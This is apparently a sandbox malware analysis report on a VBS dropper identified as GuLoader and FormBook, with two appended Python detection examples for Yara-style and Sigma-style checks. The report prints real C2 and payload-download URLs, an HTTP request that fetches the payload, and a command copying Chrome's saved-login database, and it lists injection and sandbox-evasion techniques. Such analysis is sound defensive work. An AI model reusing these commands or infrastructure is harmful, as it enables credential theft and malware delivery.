Windows Analysis Report: MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name: MTIR22024323_0553381487_20220112120005.vbs
Analysis ID: 552589
MD5: 564601676bee71f5f61a44ef170d92a6
SHA1: 76fca984dab2358e66524172e04a3528f33d8e18
SHA256: 5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags: vbs

Detection

Families: FormBook, GuLoader
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7072 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6420 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 5244 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 4540 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 6256 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5460 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • cmstp.exe (PID: 3504 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
            • cmd.exe (PID: 5276 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6392 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • explorer.exe (PID: 6664 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ieinstal.exe (PID: 3232 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
          • ieinstal.exe (PID: 6084 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}

Note: only the "C2 list" entry is the operator-controlled server. FormBook's "decoy" entries are unrelated, mostly legitimate domains that the bot also contacts to blend its C2 traffic, so they should not be blocked or treated as indicators on their own.

Threatname: GuLoader

{"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    Strings:
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    Strings:
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    Strings:
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 further memory dump entries are not included in this extract)
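As an added example that is not part of the Joe Sandbox report: the Python below re-implements the kind of byte-string scan behind the memory dump matches above. It searches a buffer for the three JPCERT/CC strings and two of the yara-signator sequences exactly as listed, and decodes the JPCERT/CC strings as x86 "push imm32" instructions (opcode 0x68), which is what their $sqlite3step/$sqlite3text/$sqlite3blob names indicate: the constants FormBook pushes to refer to sqlite3_step, sqlite3_column_text and sqlite3_column_blob when it reads browser credential databases. $sequence_0 is the rdtsc timing check behind the "RDTSC time measurements" signature. The dump buffer is constructed here with the sequences planted at chosen offsets, and the formbook_like() condition is a stand-in assumption, not the published rules' real condition logic.

```python
"""Re-implementation of a Yara-style byte-sequence scan over a memory dump.

Added example; not part of the Joe Sandbox report. The byte patterns are the
ones listed in the Memory Dumps section; the buffer is constructed here.
"""
import re
from typing import Dict, List

# Byte strings copied from the matches above; names follow the rules' own $names.
YARA_STRINGS: Dict[str, bytes] = {
    # JPCERT/CC "Formbook" rule: each is an x86 'push imm32' (68 xx xx xx xx)
    "$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
    # yara-signator "Formbook_1" rule: two of its code sequences
    "$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "$sequence_8": bytes.fromhex("3C 54 74 04 3C 74 75 F4"),     # cmp al,'T' / je / cmp al,'t' / jne
}


def scan(buf: bytes, patterns: Dict[str, bytes] = YARA_STRINGS) -> Dict[str, List[int]]:
    """Return {pattern name: [offsets]} for every pattern present in buf."""
    hits: Dict[str, List[int]] = {}
    for name, pat in patterns.items():
        offsets = [m.start() for m in re.finditer(re.escape(pat), buf)]
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(seq: bytes) -> int:
    """Decode a 5-byte x86 'push imm32' (opcode 0x68, little-endian operand)."""
    if len(seq) != 5 or seq[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return int.from_bytes(seq[1:], "little")


def sqlite_hash_constants(hits: Dict[str, List[int]], buf: bytes) -> Dict[str, int]:
    """For each $sqlite3* hit, read the instruction at its first offset and return the constant."""
    out: Dict[str, int] = {}
    for name, offsets in hits.items():
        if name.startswith("$sqlite3"):
            out[name] = push_imm32(buf[offsets[0]:offsets[0] + 5])
    return out


def formbook_like(hits: Dict[str, List[int]]) -> bool:
    """Stand-in condition (assumption, not the published rules' logic):
    all three sqlite3 constants plus at least one code sequence."""
    sqlite_ok = all(k in hits for k in ("$sqlite3step", "$sqlite3text", "$sqlite3blob"))
    seq_ok = any(k.startswith("$sequence_") for k in hits)
    return sqlite_ok and seq_ok


def build_sample_dump() -> bytes:
    """Constructed stand-in for a .sdmp region: int3 filler with the sequences planted."""
    buf = bytearray(b"\xCC" * 0x400)
    plan = {  # two hits per sqlite string, as in the real dump; offsets chosen for this example
        "$sqlite3step": [0x059, 0x16C],
        "$sqlite3text": [0x088, 0x1AD],
        "$sqlite3blob": [0x09B, 0x1C3],
        "$sequence_0": [0x208, 0x282],
        "$sequence_8": [0x337],
    }
    for name, offsets in plan.items():
        for off in offsets:
            buf[off:off + len(YARA_STRINGS[name])] = YARA_STRINGS[name]
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_dump()
    found = scan(dump)
    for name, offs in found.items():
        print(f"{name:14} {[hex(o) for o in offs]}")
    print("sqlite3 constants:", {k: hex(v) for k, v in sqlite_hash_constants(found, dump).items()})
    print("formbook_like:", formbook_like(found))
```

The pushed constants (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what to pivot on when the surrounding code bytes differ between builds: a rule anchored on the immediates survives recompilation better than one anchored on the exact instruction sequences around them.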

Sigma Overview

System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started | Author: Nik Seetharaman | Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 3504, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5276
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132865880383508564.6420.DefaultAppDomain.powershell
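The process tree and the Sigma entries above describe one chain: wscript.exe starts powershell.exe with -EncodedCommand, PowerShell compiles C# from AppData\Local\Temp with csc.exe, the FormBook payload runs inside ieinstal.exe, migrates into explorer.exe, which launches cmstp.exe, which spawns cmd.exe to copy Chrome's "Login Data" database. The Python below is an added example that is not part of the report and not the published Sigma rules: it rebuilds process lineage from ParentProcessId links and applies approximations of the checks named above over constructed process-creation events (PIDs, images and command lines copied from the tree; the redacted -EncodedCommand payload replaced by a harmless script encoded the way PowerShell expects, base64 over UTF-16LE). The rule names, the Sysmon-style field names and the parent PID of wscript.exe are assumptions of this example.

```python
"""Lineage reconstruction and Sigma-style checks over process-creation events.

Added example; not part of the Joe Sandbox report. The events below are
constructed from the process tree in the report, with the redacted
-EncodedCommand payload replaced by a harmless script.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, str]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def encode_ps(script: str) -> str:
    """-EncodedCommand takes base64 of the script as UTF-16LE (not UTF-8)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries -e/-enc/-EncodedCommand, else None."""
    m = re.search(r'-e(?:nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]+)', cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed events; field names mirror the Sigma "Data:" entries above.
SAMPLE_SCRIPT = "Write-Host 'constructed stand-in for the redacted payload'"
_PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Event] = [
    {"ProcessId": "7072", "ParentProcessId": "0",  # parent of wscript.exe is not in the report
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"'},
    {"ProcessId": "6420", "ParentProcessId": "7072", "Image": _PS,
     "CommandLine": f'"{_PS}" -EncodedCommand "{encode_ps(SAMPLE_SCRIPT)}"'},
    {"ProcessId": "6840", "ParentProcessId": "6420",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline"'},
    {"ProcessId": "6256", "ParentProcessId": "6420",
     "Image": r"C:\Program Files (x86)\internet explorer\ieinstal.exe",
     "CommandLine": r"C:\Program Files (x86)\internet explorer\ieinstal.exe"},
    {"ProcessId": "3440", "ParentProcessId": "6256",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Windows\Explorer.EXE"},
    {"ProcessId": "3504", "ParentProcessId": "3440",
     "Image": r"C:\Windows\SysWOW64\cmstp.exe", "CommandLine": r"C:\Windows\SysWOW64\cmstp.exe"},
    {"ProcessId": "5276", "ParentProcessId": "3504",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V'},
]


def lineage(events: List[Event], pid: str) -> List[str]:
    """Walk ParentProcessId links from pid to the root; returns image names root-first."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain[::-1]


def apply_rules(events: List[Event]) -> List[Tuple[str, str]]:
    """Approximations (assumptions, not the published Sigma logic) of the checks named
    in the report; returns (rule name, ProcessId) pairs."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits: List[Tuple[str, str]] = []
    for e in events:
        img, cmd, pid = basename(e["Image"]), e["CommandLine"], e["ProcessId"]
        parent = by_pid.get(e["ParentProcessId"])
        pimg = basename(parent["Image"]) if parent else ""
        if img == "powershell.exe" and pimg == "wscript.exe":
            hits.append(("wscript_starts_powershell", pid))
        if img == "powershell.exe" and decode_encoded_command(cmd) is not None:
            hits.append(("powershell_encoded_command", pid))  # Suspicious Execution of Powershell with Base64
        if img == "csc.exe" and re.search(r"\\AppData\\Local\\Temp\\", cmd, re.IGNORECASE):
            hits.append(("csc_source_in_temp", pid))  # Suspicious Csc.exe Source File Folder
        if pimg == "cmstp.exe":
            hits.append(("cmstp_child_process", pid))  # CMSTP Execution Process Creation
        if re.search(r"\\Login Data", cmd, re.IGNORECASE):
            hits.append(("browser_login_data_access", pid))  # Chrome credential DB copied out
    return hits


if __name__ == "__main__":
    for rule, pid in apply_rules(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid}  chain={' > '.join(lineage(SAMPLE_EVENTS, pid))}")
    print("decoded:", decode_encoded_command(SAMPLE_EVENTS[1]["CommandLine"]))
```

The lineage for the final cmd.exe (wscript.exe > powershell.exe > ieinstal.exe > explorer.exe > cmstp.exe > cmd.exe) is the part worth alerting on as a whole: each hop on its own is a LOLBin that runs on clean hosts, and explorer.exe as the parent of cmstp.exe hides the injected ieinstal.exe unless the chain is reconstructed.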

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}
Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}
Multi AV Scanner detection for submitted file
Source: MTIR22024323_0553381487_20220112120005.vbs | ReversingLabs: Detection: 12%
Yara detected FormBook
Source: Yara match | File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: unknown | HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2
      Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

Networking:

Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile Landsk, adSaveCreateOverWrite
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.jewelrystore1.com/wk3t/
Source: Malware configuration extractor | URLs: https://www.wizumiya.co.jp/html/user_da
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: www.wizumiya.co.jp
    Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: explorer.exe, 00000022.00000000.712071572.00000000049DC000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp | String found in binary or memory: http://fahrschule-heli.at/bin_WUOAiR166.bin
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.microsoft.
Source: powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
